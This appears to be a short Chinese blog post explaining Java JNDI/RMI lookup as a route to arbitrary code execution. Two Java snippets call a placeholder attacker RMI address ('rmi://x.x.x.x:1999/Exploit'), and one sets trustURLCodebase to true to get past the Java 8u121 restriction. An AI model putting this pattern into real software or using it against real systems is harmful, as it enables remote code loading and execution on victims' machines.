zoukankan      html  css  js  c++  java

  • rmi的调用

    在java8  121版本以前,只要这样就能任意代码

    rmiTest.java

    import javax.naming.InitialContext;
import javax.naming.NamingException;

public class rmiTest {
    public static void main(String[] args) throws IOException, NamingException {
        InitialContext xxx = new InitialContext();
        xxx.lookup("rmi://x.x.x.x:1999/Exploit");
    }
}

    在java8  121版本之后,需要加com.sun.jndi.rmi.object.trustURLCodebase=true

    rmiTest2

    import javax.naming.InitialContext;
import javax.naming.NamingException;

public class rmiTest2 {
    public static void main(String[] args) throws IOException, NamingException {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        InitialContext xxx = new InitialContext();
        xxx.lookup("rmi://x.x.x.x:1999/Exploit");
    }
}

      

    rmi在java8  121版本之前的调用满足:

    一个类,一个方法,一个参数,就能实现java的任意代码执行。
  • 相关阅读:
    Models(Pascal)
    Summer Plan(挖坑待填)
    C++之指针
    QuickPower快速幂
    codevs 1231最优布线问题
    颓废了1年+,今天开始勤(tui)奋(fei)啦
    l'Hopital法则
    相律
    小意外
    一种改进的动力学处理方法
  • 原文地址:https://www.cnblogs.com/yangxiaodi/p/10840674.html
Copyright © 2011-2022 走看看